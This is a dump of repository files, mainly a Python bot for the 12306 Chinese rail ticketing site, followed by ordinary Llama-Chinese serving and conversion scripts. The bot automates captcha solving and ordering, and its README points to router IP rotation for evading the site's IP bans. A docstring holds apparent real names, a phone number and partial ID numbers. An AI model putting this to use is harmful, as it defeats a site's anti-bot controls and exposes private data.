1)) print(u"验证码超过限定次数3次,放弃此次订票机会!") g.sendGetQueueCountAsync() else: print(ticket.AUTO_SUBMIT_ORDER_REQUEST_F) if autoSubmitOrderRequestResult.get("messages", ""): print("".join(autoSubmitOrderRequestResult.get("messages", ""))) elif autoSubmitOrderRequestResult.get("validateMessages", ""): print("".join(autoSubmitOrderRequestResult.get("validateMessages", ""))) File: inter/GetSuccessRate.py from collections import OrderedDict from config.urlConf import urls import TickerConfig from inter.SubmitOrderRequest import submitOrderRequestByAfterNate class getSuccessRate: def __init__(self, session, secretList): """ 获取成功信息 """ self.secretList = secretList self.session = session def data_apr(self): """ secretList 9vqa9%2B%2F%2Fsdozmm22hpSeDTGqRUwSuA2D0r%2BmU%2BLZj7MK7CDuf5Ep1xpxl4Dyxfmoah%2BaB9TZSesU%0AkxBbo5oNgR1vqMfvq66VP0T7tpQtH%2BbVGBz1FolZG8jDD%2FHqnz%2FnvdBP416Og6WGS14O%2F3iBSwT8%0AkRPsNF0Vq0U082g0tlJtP%2BPn7TzW3z7TDCceMJIjFcfEOA%2BW%2BuK%2Bpy6jCQMv0TmlkXf5aKcGnE02%0APuv4I8nF%2BOWjWzv9CrJyiCZiWaXd%2Bi7p69V3a9dhF787UgS660%2BqKRFB4RLwAfic3MkAlfpGWhMY%0ACfARVQ%3D%3D#O _json_att 候补一次只能补一个座位,默认取TICKET_TYPE第一个 :return: """ ticker = TickerConfig.PASSENGER_TICKER_STR.get(TickerConfig.SET_TYPE[0]) data = OrderedDict() data["successSecret"] = f"{self.secretList}#{ticker}" data["_json_att"] = "" return data def sendSuccessRate(self): successRateRsp = self.session.httpClint.send(urls.get("getSuccessRate"), self.data_apr()) if not successRateRsp.get("status"): print("".join(successRateRsp.get("messages")) or successRateRsp.get("validateMessages")) return flag = successRateRsp.get("data", {}).get("flag")[0] train_no = flag.get("train_no") print(f"准备提交候补订单,{flag.get('info')}") submit = submitOrderRequestByAfterNate(self.session, self.secretList, train_no) submit.sendSubmitOrderRequest() File: inter/CheckRandCodeAnsyn.py # coding=utf-8 class checkRandCodeAnsyn: def __init__(self, session, randCode, token): self.session = session self.randCode = randCode self.token = token def data_par(self): """ :return: """ data = { "randCode": self.randCode, "rand": "randp", "_json_att": "", "REPEAT_SUBMIT_TOKEN": self.token } return data def sendCheckRandCodeAnsyn(self): """ 下单验证码识别 :return: """ checkRandCodeAnsynUrl = self.session.urls["checkRandCodeAnsyn"] fresult = self.session.httpClint.send(checkRandCodeAnsynUrl, self.data_par()) # 校验验证码是否正确 return fresult['data']['msg'] File: inter/GetPassengerDTOs.py # coding=utf-8 import json from config.TicketEnmu import ticket from myException.PassengerUserException import PassengerUserException import wrapcache import TickerConfig class getPassengerDTOs: """ 获取乘客信息 :return: """ def __init__(self, selectObj, ticket_peoples=None, set_type=None, is_more_ticket_num=None): """ :param session: 登录实例 :param ticket_peoples: 乘客 :param set_type: 坐席 """ if ticket_peoples is None: ticket_peoples = [] self.session = selectObj self.ticket_peoples = ticket_peoples self.is_more_ticket_num = is_more_ticket_num self.set_type = set_type def sendGetPassengerDTOs(self): getPassengerDTOsResult = self.session.httpClint.send(self.session.urls["get_passengerDTOs"], json.dumps({"_json_att": ""})) if getPassengerDTOsResult.get("data", False) and getPassengerDTOsResult["data"].get("normal_passengers", False): normal_passengers = getPassengerDTOsResult['data']['normal_passengers'] _normal_passenger = [normal_passengers[i] for i in range(len(normal_passengers)) if normal_passengers[i]["passenger_name"] in self.ticket_peoples] return _normal_passenger if _normal_passenger else [normal_passengers[0]] # 如果配置乘车人没有在账号,则默认返回第一个用户 else: if getPassengerDTOsResult.get("data", False) and getPassengerDTOsResult['data'].get("exMsg", False): print(getPassengerDTOsResult['data'].get("exMsg", False)) elif getPassengerDTOsResult.get('messages', False): print(getPassengerDTOsResult.get('messages', False)) else: print(u"警告:您的账号可能买票有问题,获取不到联系人,请测试是否能正常下单,在捡漏或者购票!!!") print(u"警告:您的账号可能买票有问题,获取不到联系人,请测试是否能正常下单,在捡漏或者购票!!!") print(u"警告:您的账号可能买票有问题,获取不到联系人,请测试是否能正常下单,在捡漏或者购票!!!") # raise PassengerUserException(ticket.DTO_NOT_FOUND) def getPassengerTicketStr(self, set_type): """ 获取getPassengerTicketStr 提交对应的代号码 :param str: 坐席 :return: """ passengerTicketStr = { '一等座': 'M', '特等座': 'P', '二等座': 'O', '商务座': 9, '硬座': 1, '无座': 1, '软座': 2, '软卧': 4, '硬卧': 3, } return str(passengerTicketStr[set_type.replace(' ', '')]) def getPassengerTicketStrListAndOldPassengerStr(self, secretStr, secretList): """ 获取提交车次人内容格式 passengerTicketStr O,0,1,文贤平,1,43052419950223XXXX,15618715583,N_O,0,1,梁敏,1,43052719920118XXXX,,N oldPassengerStr 文贤平,1,43052719920118XXXX,1_梁敏,1,43052719920118XXXX,1 ps: 如果is_more_ticket打开了的话,那就是读取联系人列表里面前符合车次数量的前几个联系人 :return: """ passengerTicketStrList = [] oldPassengerStr = [] tickers = [] set_type = "" if wrapcache.get("user_info"): # 如果缓存中有联系人方式,则读取缓存中的联系人 user_info = wrapcache.get("user_info") print(u"使用缓存中查找的联系人信息") else: user_info = self.sendGetPassengerDTOs() wrapcache.set("user_info", user_info, timeout=9999999) if not user_info: raise PassengerUserException(ticket.DTO_NOT_IN_LIST) if len(user_info) < self.is_more_ticket_num: # 如果乘车人填错了导致没有这个乘车人的话,可能乘车人数会小于自动乘车人 self.is_more_ticket_num = len(user_info) if secretStr: set_type = self.getPassengerTicketStr(self.set_type) if self.is_more_ticket_num is 1: passengerTicketStrList.append( '0,' + user_info[0]['passenger_type'] + "," + user_info[0][ "passenger_name"] + "," + user_info[0]['passenger_id_type_code'] + "," + user_info[0]['passenger_id_no'] + "," + user_info[0]['mobile_no'] + ',N,' + user_info[0]["allEncStr"]) oldPassengerStr.append( user_info[0]['passenger_name'] + "," + user_info[0]['passenger_id_type_code'] + "," + user_info[0]['passenger_id_no'] + "," + user_info[0]['passenger_type'] + '_') else: for i in range(self.is_more_ticket_num): passengerTicketStrList.append( '0,' + user_info[i]['passenger_type'] + "," + user_info[i][ "passenger_name"] + "," + user_info[i]['passenger_id_type_code'] + "," + user_info[i][ 'passenger_id_no'] + "," + user_info[i]['mobile_no'] + ',N,' + user_info[i]["allEncStr"] + '_' + set_type) oldPassengerStr.append( user_info[i]['passenger_name'] + "," + user_info[i]['passenger_id_type_code'] + "," + user_info[i]['passenger_id_no'] + "," + user_info[i]['passenger_type'] + '_') elif secretList: """ 候补订单有多少个联系人,就候补多少个联系人了,没有优先提交之说 1#XXXX#1#***************77X#bf6ae40d3655ae7eff005ee21d95876b38ab97a8031b464bc2f74a067e3ec957; """ for user in user_info: tickers.append(f"1#{user['passenger_name']}#1#{user['passenger_id_no']}#{user['allEncStr']};") return { "passengerTicketStrList": set_type + "," + ",".join(passengerTicketStrList), "passengerTicketStrByAfterLate": "".join(tickers), "oldPassengerStr": "".join(oldPassengerStr), "code": ticket.SUCCESS_CODE, "set_type": set_type, "status": True, "user_info": user_info, } File: inter/LoginAysnSuggest.py # coding=utf-8 from config.urlConf import urls def loginAysnSuggest(session, username, password): """ 登录接口 ps: 不需要验证码 :return: """ loginAysnSuggestUrls = urls.get("loginAysnSuggest") data = { "loginUserDTO.user_name": username, "userDTO.password": password } loginAysnSuggestRsp = session.httpClint.send(urls=loginAysnSuggestUrls, data=data) if loginAysnSuggestRsp and loginAysnSuggestRsp.get("httpstatus") is 200 and loginAysnSuggestRsp.get("data", {}).get("loginCheck") == "Y": print(u"登录成功") else: print(u"登录失败, {0} {1}".format("".join(loginAysnSuggestRsp.get("messages")), loginAysnSuggestRsp.get("validateMessages"))) File: inter/GetRandCode.py # coding=utf-8 from PIL import Image from config.urlConf import urls from myUrllib.httpUtils import HTTPClient from verify.localVerifyCode import Verify import TickerConfig import os if TickerConfig.AUTO_CODE_TYPE == 2: v = Verify() def getRandCode(is_auto_code, auto_code_type, result): """ 识别验证码 :return: 坐标 """ try: if is_auto_code: if auto_code_type == 1: print(u"打码兔已关闭, 如需使用自动识别,请使用如果平台 auto_code_type == 2") return elif auto_code_type == 2: Result = v.verify(result) return codexy(Ofset=Result, is_raw_input=False) elif auto_code_type == 3: print("您已设置使用云打码,但是服务器资源有限,请尽快改为本地打码" if "CAPTCHALOCAL" not in os.environ else "已设置本地打码服务器") http = HTTPClient(0) Result = http.send(urls.get("autoVerifyImage"), {"imageFile": result}) if Result and Result.get("code") is 0: return codexy(Ofset=Result.get("data"), is_raw_input=False) else: img = Image.open('./tkcode.png') img.show() return codexy() except Exception as e: print(e) def codexy(Ofset=None, is_raw_input=True): """ 获取验证码 :return: str """ if is_raw_input: print(u""" ***************** | 1 | 2 | 3 | 4 | ***************** | 5 | 6 | 7 | 8 | ***************** """) print(u"验证码分为8个,对应上面数字,例如第一和第二张,输入1, 2 如果开启cdn查询的话,会冲掉提示,直接鼠标点击命令行获取焦点,输入即可,不要输入空格") print(u"如果是linux无图形界面,请使用自动打码,is_auto_code: True") print(u"如果没有弹出验证码,请手动双击根目录下的tkcode.png文件") Ofset = input(u"输入对应的验证码: ") if isinstance(Ofset, list): select = Ofset else: Ofset = Ofset.replace(",", ",") select = Ofset.split(',') post = [] offsetsX = 0 # 选择的答案的left值,通过浏览器点击8个小图的中点得到的,这样基本没问题 offsetsY = 0 # 选择的答案的top值 for ofset in select: if ofset == '1': offsetsY = 77 offsetsX = 40 elif ofset == '2': offsetsY = 77 offsetsX = 112 elif ofset == '3': offsetsY = 77 offsetsX = 184 elif ofset == '4': offsetsY = 77 offsetsX = 256 elif ofset == '5': offsetsY = 149 offsetsX = 40 elif ofset == '6': offsetsY = 149 offsetsX = 112 elif ofset == '7': offsetsY = 149 offsetsX = 184 elif ofset == '8': offsetsY = 149 offsetsX = 256 else: pass post.append(offsetsX) post.append(offsetsY) randCode = str(post).replace(']', '').replace('[', '').replace("'", '').replace(' ', '') print(u"验证码识别坐标为{0}".format(randCode)) return randCode File: inter/ConfirmHB.py from collections import OrderedDict from config.urlConf import urls import TickerConfig from inter.GetQueueCount import queryQueueByAfterNate class confirmHB: def __init__(self, secretList, session, tickerNo, jzdhDate): """ 人脸识别 """ self.secretList = secretList self.session = session self.passengerTicketStrByAfterLate = session.passengerTicketStrByAfterLate self.tickerNo = tickerNo self.jzdhDate = jzdhDate def data_apr(self): """ passengerInfo 1#XXXX#1#***************77X#bf6ae40d3655ae7eff005ee21d95876b38ab97a8031b464bc2f74a067e3ec957; jzParam 2019-08-31#19#00 hbTrain 5l000G177230,O# lkParam :return: """ ticker = TickerConfig.PASSENGER_TICKER_STR.get(TickerConfig.SET_TYPE[0]) data = OrderedDict() data["passengerInfo"] = self.passengerTicketStrByAfterLate data["jzParam"] = self.jzdhDate data["hbTrain"] = f"{self.tickerNo},{ticker}#" data["lkParam"] = "" return data def sendChechFace(self): ChechFaceRsp = self.session.httpClint.send(urls.get("confirmHB"), self.data_apr()) if not ChechFaceRsp.get("status"): print("".join(ChechFaceRsp.get("messages")) or ChechFaceRsp.get("validateMessages")) return data = ChechFaceRsp.get("data") if not data.get("flag"): print(f"错误信息:{data.get('msg')}") return queue = queryQueueByAfterNate(self.session) queue.sendQueryQueueByAfterNate() File: inter/GetQueueCountAsync.py import TickerConfig []# coding=utf-8 import datetime import sys import time from collections import OrderedDict import wrapcache from inter.ConfirmSingleForQueueAsys import confirmSingleForQueueAsys class getQueueCountAsync: """ 排队 """ def __init__(self, session, train_no, stationTrainCode, fromStationTelecode, toStationTelecode, leftTicket, set_type, users, station_dates, passengerTicketStr, oldPassengerStr, result, ifShowPassCodeTime): self.train_no = train_no self.session = session self.stationTrainCode = stationTrainCode self.fromStationTelecode = fromStationTelecode self.toStationTelecode = toStationTelecode self.set_type = set_type self.leftTicket = leftTicket self.users = users self.station_dates = station_dates self.passengerTicketStr = passengerTicketStr self.oldPassengerStr = oldPassengerStr self.result = result self.ifShowPassCodeTime=ifShowPassCodeTime def data_par(self): """ - 字段说明 - train_date 时间 - train_no 列车编号,查询代码里面返回 - stationTrainCode 列车编号 - seatType 对应坐席 - fromStationTelecode 起始城市 - toStationTelecode 到达城市 - leftTicket 查询代码里面返回 - purpose_codes 学生还是成人 - _json_att 没啥卵用,还是带上吧 :return: """ if sys.version_info.major is 2: new_train_date = filter(None, str(time.asctime(time.strptime(self.station_dates, "%Y-%m-%d"))).split(" ")) else: new_train_date = list(filter(None, str(time.asctime(time.strptime(self.station_dates, "%Y-%m-%d"))).split(" "))) data = OrderedDict() data['train_date'] = "{0} {1} {2} {3} 00:00:00 GMT+0800 (中国标准时间)".format( new_train_date[0], new_train_date[1], new_train_date[2] if len(new_train_date[2]) is 2 else f"0{new_train_date[2]}", new_train_date[4], time.strftime("%H:%M:%S", time.localtime(time.time())) ), data["train_no"] = self.train_no data["stationTrainCode"] = self.stationTrainCode data["seatType"] = self.set_type data["fromStationTelecode"] = self.fromStationTelecode data["toStationTelecode"] = self.toStationTelecode data["leftTicket"] = self.leftTicket data["purpose_codes"] = "ADULT" data["_json_att"] = "" return data def conversion_int(self, str): return int(str) def sendGetQueueCountAsync(self): """ 请求排队接口 :return: """ urls = self.session.urls["getQueueCountAsync"] data = self.data_par() getQueueCountAsyncResult = self.session.httpClint.send(urls, data) if getQueueCountAsyncResult.get("status", False) and getQueueCountAsyncResult.get("data", False): if "status" in getQueueCountAsyncResult and getQueueCountAsyncResult["status"] is True: if "countT" in getQueueCountAsyncResult["data"]: ticket_data = getQueueCountAsyncResult["data"]["ticket"] ticket_split = sum(map(self.conversion_int, ticket_data.split(","))) if ticket_data.find( ",") != -1 else ticket_data if int(ticket_split) is 0: # 增加余票数为0时,将车次加入小黑屋 wrapcache.set(key=self.train_no, value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) print(f"排队失败,当前余票数为{ticket_split}张") return print(u"排队成功, 当前余票还剩余: {0} 张".format(ticket_split)) c = confirmSingleForQueueAsys(session=self.session, passengerTicketStr=self.passengerTicketStr, oldPassengerStr=self.oldPassengerStr, result=self.result,) print(u"验证码提交安全期,等待{}MS".format(self.ifShowPassCodeTime)) time.sleep(self.ifShowPassCodeTime) c.sendConfirmSingleForQueueAsys() else: print(u"排队发现未知错误{0},将此列车 {1}加入小黑屋".format(getQueueCountAsyncResult, self.train_no)) wrapcache.set(key=self.train_no, value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) elif "messages" in getQueueCountAsyncResult and getQueueCountAsyncResult["messages"]: print(u"排队异常,错误信息:{0}, 将此列车 {1}加入小黑屋".format(getQueueCountAsyncResult["messages"][0], self.train_no)) wrapcache.set(key=self.train_no, value=datetime.datetime.now(), timeout=TickerConfig.TICKET_BLACK_LIST_TIME * 60) else: if "validateMessages" in getQueueCountAsyncResult and getQueueCountAsyncResult["validateMessages"]: print(str(getQueueCountAsyncResult["validateMessages"])) File: myException/ticketNumOutException.py class ticketNumOutException(Exception): pass File: myException/UserPasswordException.py class UserPasswordException(Exception): pass File: myException/ticketConfigException.py class ticketConfigException(Exception): pass File: myException/__init__.py File: myException/ticketIsExitsException.py class ticketIsExitsException(Exception): pass File: myException/balanceException.py class balanceException(Exception): pass File: myException/PassengerUserException.py class PassengerUserException(Exception): pass File: tmp/__init__.py File: tmp/log/__init__.py
### 12306 购票小助手 #### python版本 - [ ] 2.7.10 - 2.7.15 - [x] 3.6 - 3.7.4 - [ ] 2.7.9 #### 已有功能 - [x] 自动打码 - [x] 自动登录 - [x] 准点预售和捡漏 - [x] 智能候补 - [x] 邮件通知 - [x] server酱通知 #### 依赖库 - 验证码目前可以本地识别,需要下载模型,放于项目根目录,全部代码来源于此项目 [传送门](https://github.com/zhaipro/easy12306),表示感谢 ``` 1. 模型下载链接:https://pan.baidu.com/s/1rS155VjweWVWIJogakechA 密码:bmlm 群里面也可以下载 2. git仓库下载:https://github.com/testerSunshine/12306model.git ``` - 自托管云打码服务器搭建:[12306_code_server](https://github.com/YinAoXiong/12306_code_server) - 如果大家有空闲的服务器,可搭建之后在这个 [issues](https://github.com/testerSunshine/12306/issues/446) 里面填入自己的服务器(请注意服务器安全!) - 项目依赖 [requirements.txt](requirements.txt) - 安装方法x: - root用户(避免多python环境产生问题): `pip3 install -i https://pypi.tuna.tsinghua.edu.cn/simple -r requirements.txt` - 非root用户(避免安装和运行时使用了不同环境): `pip3 install -i https://pypi.tuna.tsinghua.edu.cn/simple -r requirements.txt` - 许多windows的用户装不了tensorflow的话,可以适当降低版本或者升高版本都是可以的 ``` 1. tensorflow的兼容版本 1.14.0rc\1.14.0rc\1.15.0\1.15.0rc 以上版本都测试无问题 2. 如果pip代理的清华源无法下载,可以更换其他源解决此问题 ``` #### 项目使用说明 - 服务器启动: - 修改[配置](TickerConfig.py)文件 - 可以配置邮箱,配置邮箱的格式在[配置](TickerConfig.py)里面可以看到ex ``` # 测试邮箱和server酱是否可用, server酱测试的前提是server酱开关开启 # 可以配置server酱提醒(推荐)[配置教程](https://www.jianshu.com/p/8d10b5b9c4e3) # 用python3 还是python 完全取决于安装的时候配置的环境变量是否为python3,以下启动默认环境变量为python3 python3 run.py t ``` - 配置[配置](TickerConfig.py)文件的时候,需注意空格和遵循python语法格式 - 启动前请先筛选cdn,这点很`重要` ``` python3 run.py c ``` - 启动服务 ``` python3 run.py r ``` - 如果你不知道如何操作,下面的命令可能会帮助你 ``` python3 run.py -h —————————————————————————— sage: run.py [-h] operate positional arguments: operate r: 运行抢票程序, c: 过滤cdn, t: 测试邮箱和server酱,server酱 ``` - 如果你的服务器安装了docker与docker-compose, 那么你可以忽略上面的**所有**步骤,直接按以下步骤操作,即可开始抢票: - 前提条件: - 请确认你安装的docker版本为18.09及以上: `docker -v` - 请确认你安装的docker-compose版本为1.23.2及以上: `docker-compose -v` - 请根据自己需要修改好配置文件:`TickerConfig.py` - 请修改配置文件`TickerConfig.py`中的变量`AUTO_CODE_TYPE`和`HOST`,`AUTO_CODE_TYPE`改为`3`, HOST改为`"captcha:80"`(这里很重要,这是本地打码服务器的配置) - 运行命令: - 开始抢票:`docker-compose up --build -d` - 停止抢票:`docker-compose down` - 查看抢票log: `docker logs --follow ticket` #### 目录对应说明 - agency - cdn代理 - config - 项目配置 - verify - 自动打码 - init - 项目主运行目录 - inter - 接口 - myException - 异常 - myUrllib request网络请求库 #### 思路图 - ![image](uml/uml.png) #### 项目声明: - 本软件只供学习交流使用,勿作为商业用途,交流群号 - 1群:286271084(已满) - 2群:649992274(已满) - 3群:632501142(已满) - 4群: 606340519(已满) - 5群: 948526733(已满) - 7群: 660689659(已满) - 8群: 620629239(已满) - 6群: 608792930(未满) - 9群: 693035807(未满) - 请不要重复加群,一个群就可以了,把机会留给更多人 - **进群先看公告!!!进群先看公告!!!进群先看公告!!! 重要的事情说三遍** - 能为你抢到一张回家的票,是我最大的心愿 #### 日志列子 - 成功log,如果是购票失败的,请带上失败的log给我,我尽力帮你调,也可加群一起交流,程序只是加速买票的过程,并不一定能买到票 ``` 正在第355次查询 乘车日期: 2018-02-12 车次G4741,G2365,G1371,G1377,G1329 查询无票 代理设置 无 总耗时429ms 车次: G4741 始发车站: 上海 终点站: 邵阳 二等座:有 正在尝试提交订票... 尝试提交订单... 出票成功 排队成功, 当前余票还剩余: 359 张 正在使用自动识别验证码功能 验证码通过,正在提交订单 提交订单成功! 排队等待时间预计还剩 -12 ms 排队等待时间预计还剩 -6 ms 排队等待时间预计还剩 -7 ms 排队等待时间预计还剩 -4 ms 排队等待时间预计还剩 -4 ms 恭喜您订票成功,订单号为:EB52743573, 请立即打开浏览器登录12306,访问‘未完成订单’,在30分钟内完成支付! ``` #### 使用帮助(一些安装问题和使用反馈较多的问题): - 测试邮箱是否可用 [邮箱配置问题看issues](https://github.com/testerSunshine/12306/issues/107) - 学生票issues [学生票修改](https://github.com/testerSunshine/12306/issues/47) - 依赖安装不对的问题(ImportError)[requirements.txt问题](https://github.com/testerSunshine/12306/issues/91) - 若快豆子疑问 [点我](https://github.com/testerSunshine/12306/issues/67) - IOError: 【Errno 0】 Error 问题 [点我](https://github.com/testerSunshine/12306/issues/159) - 测试下单接口是否可用,有两个下单接口,随便用哪个都ok - 如果下载验证码过期或者下载失败的问题,应该是12306封ip的策略,多重试几次,12306现在封服务器(阿里云和腾讯云)ip比较严重,尽量不要放在服务器里面 - 目前12306对服务器ip比较敏感,大家还是在自己家里挂着吧 - 自动更换ip软件目前已支持TPLINK和小米路由器,只限家庭网络[点我跳转](https://github.com/testerSunshine/AutoRouterIP) #### 感谢一下小伙伴对本项目提供的帮助 - @[email protected] - @ 才 - @[MonsterTan](https://github.com/MonsterTan) - 以及所有为此项目提供pr的同学 #### 更新日志 - [更新日志](Update.md)
Llama-Chinese
ecff929b627122ef10da3f7ed2085caf793ba7e5
File: scripts/api/accelerate_client.py # coding=utf-8 import json import time import urllib.request import sys def test_api_server(input_text): header = {'Content-Type': 'application/json'} data = { "system_prompt": "", "history": inputs, "n" : 1, "best_of": 1, "presence_penalty": 1.2, "frequency_penalty": 0.2, "temperature": 0.3, "top_p" : 0.95, "top_k": 50, "use_beam_search": False, "stop": [], "ignore_eos" :False, "logprobs": None, "max_new_tokens": 2048, } request = urllib.request.Request( url='http://127.0.0.1:8001/generate', headers=header, data=json.dumps(data).encode('utf-8') ) result = None try: response = urllib.request.urlopen(request, timeout=300) res = response.read().decode('utf-8') result = json.loads(res) print(json.dumps(data, ensure_ascii=False, indent=2)) print(json.dumps(result, ensure_ascii=False, indent=2)) except Exception as e: print(e) return result if __name__ == "__main__": # 多伦对话测试 """ 多伦对话测试 last_question = "怎么回来呢" inputs = [{"role": "Human", "content": "如何去北京"}, {"role": "Assitant", "content": "乘坐飞机或者轮船"}, {"role" : "Human", "content": last_question}] """ # 单轮对话 last_question = "怎么去北京" inputs = [ {"role" : "Human", "content": last_question}] test_api_server(inputs) File: scripts/api/accelerate_server.py # coding=utf-8 import argparse import gc import math import os import time from fastapi import FastAPI, Request from transformers import AutoTokenizer, AutoModel import uvicorn, json, datetime import torch import torch.distributed as dist from transformers import AutoConfig, AutoModelForCausalLM, AutoTokenizer parser = argparse.ArgumentParser() parser.add_argument('--model_path',required=True,type=str) parser.add_argument('--gpus', default="0", type=str) parser.add_argument('--infer_dtype', default="int8", choices=["int4", "int8", "float16"], required=False,type=str) parser.add_argument('--model_source', default="llama2_chinese", choices =["llama2_chinese", "llama2_meta", "llama3_meta"], required=False,type=str) args = parser.parse_args() os.environ["CUDA_VISIBLE_DEVICES"] = args.gpus local_rank = int(os.getenv("LOCAL_RANK", "0")) world_size = torch.cuda.device_count() rank = local_rank app = FastAPI() def get_prompt_llama2chinese( chat_history, system_prompt="" ) -> str: prompt = '' for input_text_one in chat_history: prompt += "<s>"+input_text_one['role']+": "+input_text_one['content'].strip()+"\n</s>" if chat_history[-1]['role']=='Human': prompt += "<s>Assistant: " else: prompt += "<s>Human: " prompt = prompt[-2048:] if len(system_prompt)>0: prompt = '<s>System: '+system_prompt.strip()+'\n</s>'+prompt return prompt def get_prompt(chat_history, system_prompt=""): B_INST, E_INST = "[INST]", "[/INST]" B_SYS, E_SYS = "<<SYS>>\n", "\n<</SYS>>\n\n" sep = " " sep2 =" </s><s>" stop_token_ids = [2] system_template = f"[INST] <<SYS>>\n{system_prompt}\n<</SYS>>\n\n" roles = ("[INST]", "[/INST]") seps = [sep, sep2] if system_prompt.strip() != "": ret = system_template else: ret = "[INST] " for i, chat in enumerate(chat_history): message = chat["content"] role = chat["role"] if message: if i == 0: ret += message + " " else: if role == "Human": ret += "[INST]" + " " + message + seps[i % 2] else: ret += "[/INST]" + " " + message + seps[i % 2] else: if role == "Human": ret += "[INST]" else: ret += "[/INST]" print("prompt:{}".format(ret)) return ret def get_prompt_llama3(chat_history, system_prompt=""): system_format='<|start_header_id|>system<|end_header_id|>\n\n{content}<|eot_id|>' user_format='<|start_header_id|>user<|end_header_id|>\n\n{content}<|eot_id|>' assistant_format='<|start_header_id|>assistant<|end_header_id|>\n\n{content}<|eot_id|>\n' prompt_str = '' # 拼接历史对话 for item in chat_history: if item['role']=='Human': prompt_str+=user_format.format(content=item['content']) else: prompt_str+=assistant_format.format(content=item['content']) if len(system_prompt)>0: prompt_str = system_format.format(content=system_prompt) + prompt_str prompt_str = "<|begin_of_text|>" + prompt_str return prompt_str @app.post("/generate") async def create_item(request: Request): global model, tokenizer json_post_raw = await request.json() json_post = json.dumps(json_post_raw) json_post_list = json.loads(json_post) history = json_post_list.get('history') system_prompt = json_post_list.get('system_prompt') max_new_tokens = json_post_list.get('max_new_tokens') top_p = json_post_list.get('top_p') temperature = json_post_list.get('temperature') if args.model_source == "llama2_meta": prompt = get_prompt(history, system_prompt) elif args.model_source == "llama3_meta": prompt = get_prompt_llama3(history, system_prompt) else: prompt = get_prompt_llama2chinese(history, system_prompt) inputs = tokenizer([prompt], return_tensors='pt').to("cuda") generate_kwargs = dict( inputs, # streamer=streamer, max_new_tokens=max_new_tokens, do_sample=True, top_p=top_p, top_k=50, temperature=temperature, num_beams=1, repetition_penalty=1.2, max_length=2048, ) generate_ids = model.generate(**generate_kwargs) generate_ids = [item[len(inputs[0]):-1] for item in generate_ids] bot_message = tokenizer.batch_decode(generate_ids, skip_special_tokens=True, clean_up_tokenization_spaces=False)[0] if 'Human:' in bot_message: bot_message = bot_message.split('Human:')[0] now = datetime.datetime.now() time = now.strftime("%Y-%m-%d %H:%M:%S") answer = { "response": bot_message, "status": 200, "time": time } return answer def get_world_size() -> int: if dist.is_initialized(): return dist.get_world_size() else: return 1 def print_rank0(*msg): if rank != 0: return print(*msg) if __name__ == '__main__': dtype = torch.float16 kwargs = dict( device_map="auto", ) print("get_world_size:{}".format(get_world_size())) infer_dtype = args.infer_dtype if infer_dtype not in ["int4", "int8", "float16"]: raise ValueError("infer_dtype must one of int4, int8 or float16") if get_world_size() > 1: kwargs["device_map"] = "balanced_low_0" if infer_dtype == "int8": print_rank0("Using `load_in_8bit=True` to use quanitized model") kwargs["load_in_8bit"] = True else: kwargs["torch_dtype"] = dtype tokenizer = AutoTokenizer.from_pretrained(args.model_path, trust_remote_code=True) if infer_dtype in ["int8", "float16"]: model = AutoModelForCausalLM.from_pretrained(args.model_path, **kwargs,trust_remote_code=True,use_flash_attention_2=True) elif infer_dtype == "int4": from auto_gptq import AutoGPTQForCausalLM, get_gptq_peft_model model = AutoGPTQForCausalLM.from_quantized( args.model_path, device="cuda:0", use_triton=False, low_cpu_mem_usage=True, # inject_fused_attention=False, # inject_fused_mlp=False ) model.eval() uvicorn.run(app, host='0.0.0.0', port=8001, workers=1) File: scripts/convert2hf/convert_llama_weights_to_hf.py # Copyright 2022 EleutherAI and The HuggingFace Inc. team. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import argparse import gc import json import os import shutil import warnings import torch from transformers import LlamaConfig, LlamaForCausalLM, LlamaTokenizer try: from transformers import LlamaTokenizerFast except ImportError as e: warnings.warn(e) warnings.warn( "The converted tokenizer will be the `slow` tokenizer. To use the fast, update your `tokenizers` library and re-run the tokenizer conversion" ) LlamaTokenizerFast = None """ Sample usage: ``` python src/transformers/models/llama/convert_llama_weights_to_hf.py \ --input_dir /path/to/downloaded/llama/weights --model_size 7B --output_dir /output/path ``` Thereafter, models can be loaded via: ```py from transformers import LlamaForCausalLM, LlamaTokenizer model = LlamaForCausalLM.from_pretrained("/output/path") tokenizer = LlamaTokenizer.from_pretrained("/output/path") ``` Important note: you need to be able to host the whole model in RAM to execute this script (even if the biggest versions come in several checkpoints they each contain a part of each weight of the model, so we need to load them all in RAM). """ INTERMEDIATE_SIZE_MAP = { "7B": 11008, "13B": 13824, "30B": 17920, "65B": 22016, "70B": 28672, } NUM_SHARDS = { "7B": 1, "7Bf": 1, "13B": 2, "13Bf": 2, "30B": 4, "65B": 8, "70B": 8, "70Bf": 8, } def compute_intermediate_size(n, ffn_dim_multiplier=1, multiple_of=256): return multiple_of * ((int(ffn_dim_multiplier * int(8 * n / 3)) + multiple_of - 1) // multiple_of) def read_json(path): with open(path, "r") as f: return json.load(f) def write_json(text, path): with open(path, "w") as f: json.dump(text, f) def write_model(model_path, input_base_path, model_size, safe_serialization=True): os.makedirs(model_path, exist_ok=True) tmp_model_path = os.path.join(model_path, "tmp") os.makedirs(tmp_model_path, exist_ok=True) params = read_json(os.path.join(input_base_path, "params.json")) num_shards = NUM_SHARDS[model_size] n_layers = params["n_layers"] n_heads = params["n_heads"] n_heads_per_shard = n_heads // num_shards dim = params["dim"] dims_per_head = dim // n_heads base = 10000.0 inv_freq = 1.0 / (base ** (torch.arange(0, dims_per_head, 2).float() / dims_per_head)) if "n_kv_heads" in params: num_key_value_heads = params["n_kv_heads"] # for GQA / MQA num_local_key_value_heads = n_heads_per_shard // num_key_value_heads key_value_dim = dim // num_key_value_heads else: # compatibility with other checkpoints num_key_value_heads = n_heads num_local_key_value_heads = n_heads_per_shard key_value_dim = dim # permute for sliced rotary def permute(w, n_heads=n_heads, dim1=dim, dim2=dim): return w.view(n_heads, dim1 // n_heads // 2, 2, dim2).transpose(1, 2).reshape(dim1, dim2) print(f"Fetching all parameters from the checkpoint at {input_base_path}.") # Load weights if model_size == "7B": # Not sharded # (The sharded implementation would also work, but this is simpler.) loaded = torch.load(os.path.join(input_base_path, "consolidated.00.pth"), map_location="cpu") else: # Sharded loaded 